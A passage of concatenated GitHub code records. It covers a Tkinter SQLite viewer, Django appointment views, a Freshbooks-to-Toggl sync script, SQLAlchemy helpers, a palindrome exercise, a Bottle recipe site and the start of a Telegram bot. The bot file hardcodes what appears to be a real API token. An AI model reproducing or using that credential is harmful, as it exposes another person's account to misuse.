height=50)\nLabels.pack(side=LEFT)\nEntrys = Frame(VL_Group, width=500, height=50)\nEntrys.pack(side=LEFT)\n\nBody = Frame(root, width=700, height=300, bd=8, relief=\"raise\")\nBody.pack(side=BOTTOM, expand=True, fill='both')\n \n#==================================LABEL WIDGET=======================================\ntxt_title = Label(Top, width=300, font=('arial', 24), text = \"Python - Display SQLite3 Data In TreeView\")\ntxt_title.pack()\nl1=Label(Buttons1,text='Output here',font=20) # display message\nl1.pack(side=RIGHT)\n\n#==================================METHODS============================================\ndef populateView(filter):\n tree.delete(*tree.get_children())
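 # A minimal sketch of the parameterized-LIKE pattern used just below (table\n # and column names here are hypothetical):\n #   cursor.execute(\"SELECT * FROM t WHERE col LIKE ?\", ('%' + term + '%',))\n # Binding the wildcarded term as a parameter, instead of formatting it into\n # the SQL string, avoids SQL injection and quoting problems.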
print(\"attempting connection\")\n connection.Database(db)\n print(\"connection extablished\")\n connection.cursor.execute(\"SELECT * FROM `windchill_vault_20220224` where column4 like ? ORDER BY `column14` ASC LIMIT 100 \", ('%'+filter+'%',)) \n fetch = connection.cursor.fetchall()\n columns = [column[0] for column in connection.cursor.description]\n # Headings of respective columns\n try:\n # column identifiers \n tree[\"columns\"] = columns\n \n for i in columns:\n tree.column(i,stretch=NO, minwidth=0, width=200)\n tree.heading(i, text =i)\n except Exception as e:\n print(e)\n\n tree['show'] = 'headings'#remove empty first column\n\n for data in fetch:\n tree.insert('', 'end', values=data)\n\n addWidgets(columns)\n\n connection.cursor.close()\n connection.conn.close()\n \n return fetch, columns\n\nref=[] # to store the references widgets\ndef addWidgets(columns):\n for j , name in enumerate(columns):\n l=Label(Labels,text=name,font=20,fg='white')\n l.grid(row=j,column=0,padx=3, pady= 6)\n \n my_search = StringVar(name=f'{j:02}')\n e = Entry(Entrys, font=20,bg='gray',textvariable=my_search) \n e.grid(row=j, column=1,padx=10,pady=3) \n my_search.trace(\"w\", lambda name, index, mode, sv=my_search: filterTreeView(sv))\n\n ref.append(e) # store references \n\ndef my_check():\n my_flag=False\n for w in ref:\n if(len(w.get())<3):\n my_flag=True\n if(my_flag==False):\n l1.config(text=\"Form can be submitted\",fg='green')\n else:\n l1.config(text=\"Fill all the entries\",fg='red' )\n l1.after(3000, lambda: l1.config(text=''))\n\ndef filterTreeView(sv):\n search = sv.get().capitalize()\n # first clear the treeview\n tree.delete(*tree.get_children())\n # then insert matched items into treeview\n # TODO: uncomment\n try:\n for item in data_rows:\n print()\n index=int(str(sv))\n print(f'{index:02}')\n print(index)\n if search in item[index]:\n tree.insert(\"\", \"end\", values=item)\n except Exception as e:\n print(e)\n\n#==================================BUTTONS WIDGET=====================================\nbtn_display = Button(Buttons, width=15, text=\"Display All\", command=populateView)\nbtn_display.pack(side=LEFT,)\n\nb1=Button(Buttons1,text='Search', bg='lightgreen',command=lambda: my_check(),font=18)\nb1.pack(side=LEFT)\n \n#==================================LIST WIDGET========================================\nscrollbary = Scrollbar(Body, orient=VERTICAL)\nscrollbarx = Scrollbar(Body, orient=HORIZONTAL)\ntree = ttk.Treeview(Body, selectmode ='browse',yscrollcommand=scrollbary.set, xscrollcommand=scrollbarx.set)\ntree.grid(row=0,column=1,padx=30,pady=20)\ntree.pack(expand=True, fill='both')\n\n#==================================INITIALIZATION=====================================\n# Populate data\ndata_rows,columns = populateView('{$CAD_NAME}')\n\nif __name__ == '__main__':\n root.mainloop()","repo_name":"coxonch/SimpleTkinterDockerTest","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33419752222","text":"from rest_framework import status\nfrom rest_framework.response import Response \nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom doctors.models import Doctor \n\nfrom patients.models import Patient \nfrom patients.serializers import BasicPatientSerializer\n\nfrom citas_express.serializers import CitaExpressSerializer, BasicCitaExpSerializer\nfrom 
from citas_express.models import CitaExpress\n\n#PATIENT VIEWS\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createCitaExp(request):\n '''\n {\"patient\": \"<patient_id>\", \"appointment_reason\": \"Razon de la cita\"}\n ''' \n try:\n patient = Patient.objects.get(id=request.data['patient'])\n except:\n return Response({'Error': 'No hay un paciente con ese id'})\n print(patient)\n patient_serializer = BasicPatientSerializer(instance=patient, data=request.data, partial=True)\n patient_serializer.is_valid()\n\n serializer = CitaExpressSerializer(data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef checkCita(request, id):\n try:\n cita_exp = CitaExpress.objects.get(id=id)\n except:\n return Response({'Error': 'No hay una cita con ese id'})\n\n doc = cita_exp.doctor\n\n if doc == None:\n return Response('Su cita aun no ha sido aceptada')\n else:\n return Response('Su cita ha sido aceptada por el Doctor {}'.format(doc))\n\n\n#DOCTORS VIEWS \n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef waitingRoom(request):\n citas = CitaExpress.objects.filter(taken=False)\n serializer = BasicCitaExpSerializer(instance=citas, many=True, partial=True)\n\n \n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef takeCita(request, id):\n '''\n {\n \"id_cita\": \"<cita_id>\",\n }\n '''\n data = request.data\n try:\n doc = Doctor.objects.get(id=id)\n except:\n return Response({'Error': 'No hay un doctor con ese id'})\n\n try:\n cita_exp = CitaExpress.objects.get(id=data['id_cita'])\n except:\n return Response({'Error': 'No hay una cita con ese id'})\n \n cita_exp.doctor = doc\n cita_exp.taken = True\n cita_exp.save()\n\n return Response(\"Cita aceptada en un momento iniciara la videollamada\", status=status.HTTP_200_OK)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef completeCitaExp(request, id):\n try:\n patient = Patient.objects.get(id=id)\n except:\n return Response({'Error': 'No hay un paciente con ese id'})\n \n cita_exp = CitaExpress.objects.get(patient=patient, completed=False)\n cita_exp.completed = True\n cita_exp.save()\n \n\n return Response('Su cita ha sido terminada correctamente', status=status.HTTP_200_OK)\n\n","repo_name":"dreamofguitar/C2D-Django-Rest-Celery-Docker-Heroku-deploy","sub_path":"citas_express/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26229917440","text":"import argparse\nimport requests\nimport sys\nimport json\n\nimport datetime\n# from tzlocal import get_localzone\nfrom pytz import timezone\n\nfrom urllib import urlencode\nfrom requests.auth import HTTPBasicAuth\nfrom refreshbooks import api\n\nfrom pprint import pprint\n\ntry:\n import config\nexcept ImportError:\n print(\"Config file config.py.tmpl needs to be copied over to config.py\")\n sys.exit(1)\n\n\nclass TogglAPI(object):\n \"\"\"\n A wrapper for the Toggl API\n\n https://github.com/toggl/toggl_api_docs/blob/master/toggl_api.md\n \"\"\"\n\n def __init__(self, api_token):\n self.api_token = api_token\n\n def _make_url(self, section='time_entries', params={}):\n url = 'https://www.toggl.com/api/v8/{}'.format(section)\n if len(params) > 0:\n url = url + '?{}'.format(urlencode(params))\n return url
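 # For example, _make_url('time_entries', {'start_date': s.isoformat()})\n # yields https://www.toggl.com/api/v8/time_entries?start_date=...; the\n # query string is built by urlencode, so parameter values are escaped.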
 def _query(self, url, method, payload=None):\n \"\"\"Performs the actual call to Toggl API\"\"\"\n\n headers = {'content-type': 'application/json'}\n\n if method == 'GET':\n return requests.get(url, headers=headers, auth=HTTPBasicAuth(self.api_token, 'api_token'))\n elif method == 'POST':\n return requests.post(url, headers=headers, auth=HTTPBasicAuth(self.api_token, 'api_token'), data=json.dumps(payload))\n else:\n raise ValueError('Undefined HTTP method \"{}\"'.format(method))\n\n def get_workspaces(self):\n \"\"\"Get workspaces for user\"\"\"\n\n url = self._make_url(section='workspaces')\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_workspace_clients(self, wid):\n \"\"\"Get workspace clients\"\"\"\n # The original left `url` undefined here; the endpoint is built in the\n # same style as get_project_tasks below (assumed from that method).\n url = 'https://www.toggl.com/api/v8/workspaces/%d/clients' % (wid,)\n r = self._query(url=url, method='GET')\n return r.json()\n\n ## Time Entry functions\n def get_time_entries(self, start_date, end_date):\n \"\"\"Get Time Entries JSON object from Toggl\"\"\"\n\n url = self._make_url(section='time_entries', params={'start_date': start_date.isoformat(), 'end_date': end_date.isoformat()})\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_hours_tracked(self, start_date, end_date):\n \"\"\"Count the total tracked hours excluding any RUNNING real time tracked time entries\"\"\"\n # Pass the datetimes through unchanged; get_time_entries calls isoformat() itself\n time_entries = self.get_time_entries(start_date=start_date, end_date=end_date)\n\n if time_entries is None:\n return 0\n\n total_seconds_tracked = sum(max(entry['duration'], 0) for entry in time_entries)\n\n return (total_seconds_tracked / 60.0) / 60.0\n\n def get_project_tasks(self, project_id):\n \"\"\"Get project tasks from Toggl\"\"\"\n url = 'https://www.toggl.com/api/v8/projects/%d/tasks' % (project_id,)\n\n r = self._query(url=url, method='GET')\n return r.json()\n\n def get_workspace_projects(self, workspace_id):\n \"\"\"Get workspace projects from Toggl\"\"\"\n url = 'https://www.toggl.com/api/v8/workspaces/%d/projects' % (workspace_id,)\n\n r = self._query(url=url, method='GET')\n return r.json()\n\n def create_time_entry(self, project_id, description, start_date, duration, created_with='Freshbooks to Toggl'):\n # do we convert duration to something usable by Toggl or assume that it will be passed in as seconds?\n data = {\n \"time_entry\": {\n \"description\": description,\n \"pid\": project_id,\n \"start\": start_date.isoformat(),\n \"duration\": duration,\n \"created_with\": created_with\n }\n }\n url = self._make_url(section='time_entries')\n r = self._query(url=url, method='POST', payload=data)\n\n\nclass Freshbooks(object):\n \"\"\"\n Freshbooks API wrapper\n\n using the following code: https://pypi.python.org/pypi/refreshbooks/\n \"\"\"\n def __init__(self):\n self.c = api.TokenClient(\n config.FRESHBOOKS_SITE_DOMAIN,\n config.FRESHBOOKS_API_TOKEN,\n user_agent='Freshbooks to Toggl Sync'\n )\n\n def get_client_list(self):\n client_response = self.c.client.list()\n\n for client in client_response.clients.client:\n print('%s [%d]' % (client.organization, client.client_id))\n\n def get_project_list(self):\n project_response = self.c.project.list()\n\n project_entries = []\n for project in project_response.projects.project:\n project_entries.append({\n 'id': project.project_id,\n 'name': project.name,\n 'description': project.description,\n 'rate': project.rate,\n 'bill_method': project.bill_method,\n 'client_id': project.client_id\n })\n return project_entries\n\n def get_task_list(self, project_id=None):\n task_response = self.c.task.list() if project_id 
is None else self.c.task.list(project_id=project_id)\n\n task_entries = []\n for task in task_response.tasks.task:\n task_entries.append({\n 'id': task.task_id,\n 'name': task.name,\n 'description': task.description,\n 'billable': (True if task.billable == 1 else False),\n 'rate': task.rate\n })\n return task_entries\n\n def get_time_entry_pagecount(self, project_id, date_from, date_to, task_id=None):\n \"\"\"\n Returns the page count of time entries so we can iterate if needed\n \"\"\"\n time_entries_response = self.c.time_entry.list(\n project_id=project_id,\n date_from=date_from,\n date_to=date_to\n ) if task_id is None else self.c.time_entry.list(\n project_id=project_id,\n task_id=task_id,\n date_from=date_from,\n date_to=date_to\n )\n\n return time_entries_response.time_entries.attrib['pages']\n\n def get_time_entries(self, project_id, date_from, date_to, task_id=None):\n \"\"\"\n Pull back time entries from Freshbooks. Has a default of 25 entries per\n page.\n \"\"\"\n\n page_count = int(self.get_time_entry_pagecount(project_id, date_from, date_to, task_id))\n\n print('Page Count: %d' % page_count)\n time_entries = []\n\n for x in range(1, page_count+1):\n time_entries_response = self.c.time_entry.list(\n project_id=project_id,\n date_from=date_from,\n date_to=date_to,\n page=x\n ) if task_id is None else self.c.time_entry.list(\n project_id=project_id,\n task_id=task_id,\n date_from=date_from,\n date_to=date_to,\n page=x\n )\n\n for time_entry in time_entries_response.time_entries.time_entry:\n time_entries.append({\n 'id': time_entry.time_entry_id,\n 'staff_id': time_entry.staff_id,\n 'project_id': time_entry.project_id,\n 'task_id': time_entry.task_id,\n 'hours': time_entry.hours.pyval,\n 'date': time_entry.date.text,\n 'notes': time_entry.notes.text,\n 'billed': (True if time_entry.billed == 1 else False)\n })\n\n print('Number of time entries: %d' % (len(time_entries)))\n return time_entries\n\n\nclass FreshbooksToToggl(object):\n\n def __init__(self):\n self.freshbooks = Freshbooks()\n self.toggl = TogglAPI(config.TOGGL_API_TOKEN)\n self.pacific = timezone(config.TIMEZONE)\n\n def _convert_hours_to_seconds(self, hours):\n return float(hours) * 60 * 60\n\n def _freshbooks_entry_as_dict(self, freshbooks_entry):\n date_split = freshbooks_entry['date'].split('-')\n start_date = datetime.datetime(int(date_split[0]), int(date_split[1]), int(date_split[2]), 0, 0, 0, 0, tzinfo=self.pacific)\n duration = self._convert_hours_to_seconds(freshbooks_entry['hours'])\n project_id = None\n\n task_id = str(freshbooks_entry['task_id'])\n if task_id in config.F_TO_T_MAPPING:\n project_id = config.F_TO_T_MAPPING[task_id]\n else:\n return None\n\n return {\n \"billed\": freshbooks_entry['billed'],\n \"start_date\": start_date,\n \"duration\": duration,\n \"project_id\": project_id,\n \"description\": freshbooks_entry['notes']\n }\n\n def list_entries(self, start_date, end_date, freshbooks_project_id):\n freshbooks_time_entries = self.freshbooks.get_time_entries(\n project_id=freshbooks_project_id,\n date_from=start_date,\n date_to=end_date\n )\n pprint(freshbooks_time_entries, indent=4)\n\n def list_toggl_tasks(self, project_id):\n task_entries = self.toggl.get_project_tasks(project_id)\n pprint(task_entries, indent=4)\n\n def sync(self, start_date, end_date, freshbooks_project_id, create_entries):\n freshbooks_time_entries = self.freshbooks.get_time_entries(\n project_id=freshbooks_project_id,\n date_from=start_date,\n date_to=end_date\n )\n pprint(freshbooks_time_entries, indent=4)\n \"\"\"
workspace_id=362157\n # project_list = freshbooks.get_project_list()\n # pprint(project_list, indent=4)\n # task_list = freshbooks.get_task_list(project_id=58)\n # pprint(task_list, indent=4)\n\n toggl_time_entries = toggl.get_time_entries(\n datetime.datetime(2014, 2, 1, 0, 0, 0, 0, tzinfo=pytz.utc),\n datetime.datetime(2014, 2, 15, 0, 0, 0, 0, tzinfo=pytz.utc)\n )\n pprint(toggl_time_entries, indent=4)\n \"\"\"\n\n for fbe in freshbooks_time_entries:\n\n data = self._freshbooks_entry_as_dict(fbe)\n # print(\"Data is: %s\" % data)\n\n pprint(data)\n if data is not None and create_entries:\n self.toggl.create_time_entry(\n project_id=data['project_id'],\n description=data['description'],\n start_date=data['start_date'],\n duration=data['duration']\n )\n # workspace_projects = toggl.get_workspace_projects(X)\n # print json.dumps(workspace_projects, indent=4, sort_keys=True)\n # listinvoices = Freshbooks()\n\n # if args.listinvoices:\n # sbr.sync()\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='freshbooks-to-toggl')\n\n parser.add_argument(\n \"--listinvoices\",\n dest=\"listinvoices\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--from\",\n dest=\"start_date\",\n type=str,\n help=\"Start date of the form YYYY-MM-DD\"\n )\n\n parser.add_argument(\n \"--to\",\n dest=\"end_date\",\n type=str,\n help=\"End date of the form YYYY-MM-DD\"\n )\n\n parser.add_argument(\n \"--project_id\",\n dest=\"project_id\",\n type=int,\n help=\"Freshbooks Project ID\"\n )\n\n parser.add_argument(\n \"--list_entries\",\n dest=\"list_entries\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--toggl-tasks\",\n dest=\"toggl_tasks\",\n action=\"store_true\"\n )\n\n parser.add_argument(\n \"--toggl-project-id\",\n dest=\"toggl_project_id\",\n type=int,\n help=\"Toggl Project ID\"\n )\n\n parser.add_argument(\n \"--sync\",\n dest=\"sync\",\n action=\"store_true\"\n )\n\n args = parser.parse_args()\n\n if args.sync:\n print('Retrieving and posting time entries from: %s to %s' % (args.start_date, args.end_date,))\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.sync(args.start_date, args.end_date, args.project_id, create_entries=True)\n elif args.list_entries:\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.list_entries(args.start_date, args.end_date, args.project_id)\n elif args.toggl_tasks:\n fb_to_toggl = FreshbooksToToggl()\n fb_to_toggl.list_toggl_tasks(args.toggl_project_id)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kinabalu/freshbooks-to-toggl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71909921512","text":"from sqlalchemy.orm import Session\nfrom db.models.call_list import CallList, CallListOverview\n\ndef getRowsBetween(db: Session, start: int, limit: int):\n return db.query(CallList).offset(start).limit(limit).all()\n\ndef getCurrentCallList(db, user): \n current_list_info = getCurrentCallListInfo(db, user.id)\n if current_list_info: \n return db.query(CallList).filter_by(liste_id = current_list_info.liste_id).all()\n else:\n assignNewList(db, user.id)\n current_list_info = getCurrentCallListInfo(db, user.id)\n return db.query(CallList).filter_by(liste_id = current_list_info.liste_id).all()\n\ndef updateCurrentListStatus(db: Session, kunde_id: int):\n overview = db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).first()\n overview.er_ledig = True\n overview.er_ferdig = True\n 
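 # Update pattern used throughout this module: load a mapped row, mutate\n # its attributes in place, then commit once so the Session flushes a\n # single UPDATE. A hedged sketch (Model and some_id are hypothetical):\n #   row = db.query(Model).filter_by(id=some_id).first()\n #   row.flag = True\n #   db.commit()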
 db.commit()\n\ndef assignNewList(db: Session, kunde_id: int):\n newList = db.query(CallListOverview).filter_by(er_ledig = True, er_ferdig = False).first()\n newList.kunde_id = kunde_id\n newList.er_ledig = False\n db.commit() \n\n\ndef checkIfCurrentLists(db: Session, kunde_id: int ):\n return db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).scalar()\n\n\ndef checkCurrentListStatus(db: Session, kunde_id: int ):\n current_list_info = getCurrentCallListInfo(db, kunde_id)\n overview = db.query(CallListOverview).filter_by(kunde_id = str(kunde_id), er_ferdig = False).first()\n liste_id = overview.liste_id\n current_list = db.query(CallList).filter_by(liste_id = str(liste_id)).all()\n all_unfinished = []\n for i in current_list:\n if i.ringe_status == False:\n all_unfinished.append(i)\n return all_unfinished \n\ndef getCurrentCallListInfo(db: Session, kunde_id: int):\n return db.query(CallListOverview).filter_by(kunde_id = str(kunde_id)).first()\n\ndef updateCallListStatus(db: Session, org_num: int):\n callStatus = db.query(CallList).filter_by(org_num = org_num).first()\n if callStatus.ringe_status:\n callStatus.ringe_status = False\n else:\n callStatus.ringe_status = True\n db.commit()\n\ndef renewList(db: Session, user: int):\n if checkIfCurrentLists(db, user.id):\n if checkCurrentListStatus(db, kunde_id = user.id):\n return False\n updateCurrentListStatus(db, user.id)\n assignNewList(db, user.id)\n return True\n return \"Error, checkIfCurrentLists() failed!\"\n # updateCurrentListStatus(db, user.id)\n\n\n\n\n#! [OLD] NOT SURE IF IT'S NEEDED ANYMORE\ndef getOverview(db: Session, user: int):\n if checkIfCurrentLists(db, user.id):\n if checkCurrentListStatus(db, kunde_id = user.id):\n return \"Error, Please finish the current Call list before requesting a new one.\"\n updateCurrentListStatus(db, user.id)\n overview = db.query(CallListOverview).filter_by(er_ledig = True, er_ferdig = False).first()\n overview.er_ledig = False\n overview.kunde_id = user.id \n db.commit()\n return db.query(CallList)[overview.liste_start:overview.liste_limit]#.all()\n","repo_name":"Borgerod/ProSpector","sub_path":"backend/user_backend/fast_api_server/db/repository/call_list.py","file_name":"call_list.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29902394300","text":"'''Is a palindrome\n\nAsk the user to give you five words. 
Then check if any of the five words is a palindrome.\n\nA palindrome is a word that remains the same whether it's read forward or backward.\n\nExample:\n\n madam is a palindrome.\n so is malayalam.\n But not geeks.\n'''\n'''\nPseudocode\n\n1) Create a function\n2) Ask the user for input (5 words)\n3) For all of the inputs the user gives, check if any of them are palindromes\n'''\n\nif __name__ == '__main__':\n\n palindromes = [] # renamed so the built-in list() is not shadowed\n\n def is_palindrome(n=5): #create the function\n \"\"\"Reads n words and collects the ones that are palindromes\"\"\"\n for number in range(n):\n text = input()\n if text[::] == text[::-1]:\n palindromes.append(text)\n\n # call and print inside the main guard so importing the module has no side effects\n is_palindrome()\n print(palindromes)\n","repo_name":"carrickkv2/Side-Projects","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72178466153","text":"#!/usr/bin/python\r\n# -*- encoding: utf-8 -*-\r\n\r\n# import bottle.py\r\nfrom bottle import *\r\n\r\n# import the matching connection credentials\r\nimport auth_public as auth\r\n\r\n# import psycopg2\r\nimport psycopg2, psycopg2.extensions, psycopg2.extras, random\r\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODE) # avoids problems with diacritics\r\n\r\n# uncomment if you want error messages\r\n# debug(True)\r\n\r\n@get('/static/<filename>')\r\ndef static(filename):\r\n return static_file(filename, root='static') # this needs to be changed back to plain static\r\n\r\n@get('/recept/<id>')\r\ndef recept(id):\r\n cur.execute(\"SELECT recept.ime, (SELECT ime FROM uporabnik WHERE uporabnik.id = recept.avtor), \"+\r\n \"vrsta_jedi, cas_priprave, extract(year FROM datum_objave), extract(month FROM datum_objave)\"+\r\n \",extract(day FROM datum_objave), navodilo, tezavnost, priloznost.ime, sestavine_objava.vse_skupaj FROM recept \"+\r\n \"LEFT JOIN primernost ON recept.id=primernost.recept LEFT JOIN sestavine_objava ON recept.id=sestavine_objava.recept LEFT JOIN priloznost ON priloznost.id=primernost.priloznost WHERE recept.id=%s\", [id])\r\n return template('views/recept2.html', recept=cur)\r\n\r\n@get('/')\r\ndef index():\r\n cur.execute(\"SELECT recept.ime,uporabnik.ime as avtor,recept.vrsta_jedi,recept.navodilo FROM recept JOIN uporabnik ON recept.avtor=uporabnik.id\")\r\n return template('views/domov.html', index=cur)\r\n\r\n@get('/iskanje')\r\ndef iskanje_receptov():\r\n x1 = random.randint(20002, 20400)\r\n x2 = random.randint(20002, 20400)\r\n x3 = random.randint(20002, 20400)\r\n cur.execute(\"SELECT recept.id,recept.ime,recept.avtor,recept.vrsta_jedi,recept.cas_priprave,recept.datum_objave,recept.navodilo,recept.tezavnost FROM recept WHERE recept.id = %s OR recept.id = %s OR recept.id = %s\", (x1, x2, x3))\r\n return template('views/iskanje_receptov23.html', rand_recepti=cur.fetchmany(3),\r\n kljucne='', recept='', sestavina='', kategorija='', priloznost='',\r\n cas='', tezavnost='', napaka=None, prvic=True)\r\n\r\n@post('/iskanje')\r\ndef iskanje_receptov_post():\r\n pogoji = [(k, o, v) for k, o, v in [('recept.navodilo', 'ILIKE', request.forms.kljucne),\r\n ('recept.ime', 'ILIKE', request.forms.recept),\r\n ('recept.vrsta_jedi', '=', request.forms.kategorija),\r\n ('priloznost.ime', '=', request.forms.priloznost),\r\n ('sestavina.ime', '=', request.forms.sestavina),\r\n ('recept.cas_priprave', '=',\r\n request.forms.cas[:request.forms.cas.index(' ')] if ' ' in request.forms.cas else ''),\r\n ('recept.tezavnost', '=', request.forms.tezavnost)]\r\n if v != ''] # (column name, operator, value)\r\n where = ' AND '.join('{} {} {}'.format(k, o, \"'%%'||%s||'%%'\" if 'LIKE' in o else '%s')\r\n for k, o, v in pogoji) # with (I)LIKE we search for a substring
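 # Worked example (hypothetical form values): recept='juha', cas='30 min'\r\n # produce pogoji = [('recept.ime', 'ILIKE', 'juha'), ('recept.cas_priprave', '=', '30')]\r\n # and where = \"recept.ime ILIKE '%'||%s||'%' AND recept.cas_priprave = %s\";\r\n # psycopg2 then fills the %s placeholders from podatki below.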
 if where != '': # if we have any condition, add WHERE\r\n where = 'WHERE {}'.format(where)\r\n print('WHERE clause: {}'.format(where))\r\n podatki = [v for k, o, v in pogoji]\r\n cur.execute(\"\"\"\r\n SELECT recept.id, recept.ime, uporabnik.ime AS avtor, recept.vrsta_jedi,\r\n recept.cas_priprave, recept.datum_objave, recept.navodilo, recept.tezavnost\r\n FROM recept JOIN uporabnik ON recept.avtor = uporabnik.id\r\n JOIN potrebuje ON recept.id = potrebuje.recept\r\n JOIN sestavina ON sestavina.id = potrebuje.sestavina\r\n LEFT JOIN primernost ON recept.id = primernost.recept\r\n LEFT JOIN priloznost ON primernost.priloznost = priloznost.id\r\n {}\"\"\".format(where), podatki)\r\n return template('views/iskanje_receptov23.html', prvic=False,rand_recepti=cur.fetchall(),\r\n kljucne='', recept='', sestavina='', kategorija='', priloznost='',\r\n cas='', tezavnost='', napaka=None)\r\n \r\n@get('/uporabnik')\r\ndef uporabniki():\r\n cur.execute(\"SELECT * FROM uporabnik\")\r\n return template('views/uporabnik2.html', uporabnik=cur)\r\n\r\n##@get('/prijava')\r\n##def prijava():\r\n## return template('views/prijava2.html', napaka=None)\r\n##\r\n##@post('/prijava')\r\n##def prijava_registracija():\r\n## upIme1 = request.forms.upIme1\r\n## geslo = request.forms.geslo\r\n## upIme2 = request.forms.upIme2\r\n## geslo1 = request.forms.geslo1\r\n## geslo2 = request.forms.geslo2\r\n## if upIme2=='':\r\n## try:\r\n## cur.execute(\"SELECT id,ime FROM uporabnik WHERE ime=%s\",[upIme1])\r\n## uporabnik=cur\r\n## for (id,ime) in uporabnik:\r\n## cur.execute(\"SELECT * FROM geslo WHERE id=%s\",[id])\r\n## uporabnik=cur\r\n## for (id,ime,geslo0) in uporabnik:\r\n## if ime==upIme1 and geslo==geslo0:\r\n## prijavljen = True\r\n## if prijavljen:\r\n## napaka = 'Uspešno ste prijavljeni!'\r\n## return template('views/domov.html')\r\n## else:\r\n## napaka = 'Prijava neuspešna!'\r\n## return template('views/prijava2.html',napaka = napaka)\r\n## print(prijavljen)\r\n## \r\n## except Exception as ex:\r\n## return template('views/prijava2.html', upIme1=upIme1, geslo=geslo,\r\n## napaka = 'Zgodila se je napaka: %s' % ex, prijavljen=prijavljen)\r\n## elif upIme1=='':\r\n## if geslo1==geslo2:\r\n## try:\r\n## cur.execute(\"INSERT INTO uporabnik (ime, opis) VALUES (%s,'Začetnik,')\",[upIme2])\r\n## cur.execute(\"SELECT * FROM uporabnik WHERE ime=%s\",[upIme2])\r\n## uporabnik=cur\r\n## for (id,ime,datum,opis) in uporabnik:\r\n## cur.execute(\"INSERT INTO geslo (id, ime, geslo) VALUES (%s,%s,%s)\",[id,upIme2,geslo1])\r\n## return template('views/prijava2.html')\r\n## except Exception as ex:\r\n## if ex=='no results to fetch':\r\n## napaka = ''\r\n## else:\r\n## napaka ='Zgodila se je napaka: %s' % ex\r\n## print(ex)\r\n## return template('views/prijava2.html', upIme2=upIme2, geslo1=geslo1, geslo2=geslo2,\r\n## napaka = napaka)\r\n## redirect(\"/\")\r\n\r\n@get('/midva')\r\ndef midva():\r\n return template('views/midva.html')\r\n\r\n@get('/dodaj_recept')\r\ndef dodaj_recept(): # typo fixed: was dodaj_receot\r\n return template('views/dodajanje.html', ime='', sestavine='', kategorija='', priloznost='',\r\n cas='', tezavnost='')\r\n\r\n@get('/vsi_recepti')\r\ndef vsi_recepti():\r\n cur.execute(\"SELECT id,ime, navodilo FROM recept\")\r\n return template('views/vsi_recepti.html', vsi=cur)\r\n\r\n@get('/rezultati_iskanja')\r\ndef rezultati_iskanja(): # renamed: both result handlers were called vsi_recepti\r\n cur.execute(\"SELECT id,ime, navodilo FROM recept\")\r\n return template('views/rezultati.html', vsi=cur)\r\n\r\n@get('/odjava')\r\ndef odjavi():\r\n return template('views/odjava.html')\r\n\r\n@post('/po_odjavi')\r\ndef po_odjavi(): # renamed: clashed with the GET handler above\r\n cur.execute(\"SELECT recept.ime,uporabnik.ime as avtor,recept.vrsta_jedi,recept.navodilo FROM recept JOIN uporabnik ON recept.avtor=uporabnik.id\")\r\n return template('views/domov.html', index=cur)\r\n\r\n@get('/dodajanje')\r\ndef vnesi_recept():\r\n return template('views/hvala.html')\r\n\r\n@get('/hvala')\r\ndef hvala():\r\n # Unfinished function due to time constraints. We wanted to let users add\r\n # recipes to the database, but this option does not work at the moment.\r\n return template('views/hvala.html')\r\n \r\n######################################################################\r\n# Main program\r\n\r\n# connect to the database\r\nconn = psycopg2.connect(database=auth.db, host=auth.host, user=auth.user, password=auth.password)\r\nconn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT) # disable transactions\r\ncur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor) \r\n\r\n# run the server on port 8080, see http://localhost:8080/\r\nrun(host='localhost', port=8080)\r\n","repo_name":"tjasabajc/Recepti","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":8152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41020037772","text":"import logging\r\nimport asyncio\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\n\r\nAPI_TOKEN = '5758456770:AAHr6S-MCN_Nqfg7ppvOePHoUuMmYmrFXoo'\r\n\r\n# Configure logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# Initialize bot and dispatcher\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n\r\n@dp.message_handler(commands=['start', 'help'])\r\nasync def send_welcome(message: types.Message):\r\n await message.reply(\"Salom!\\nI'm TESTBot!\\nPowered by 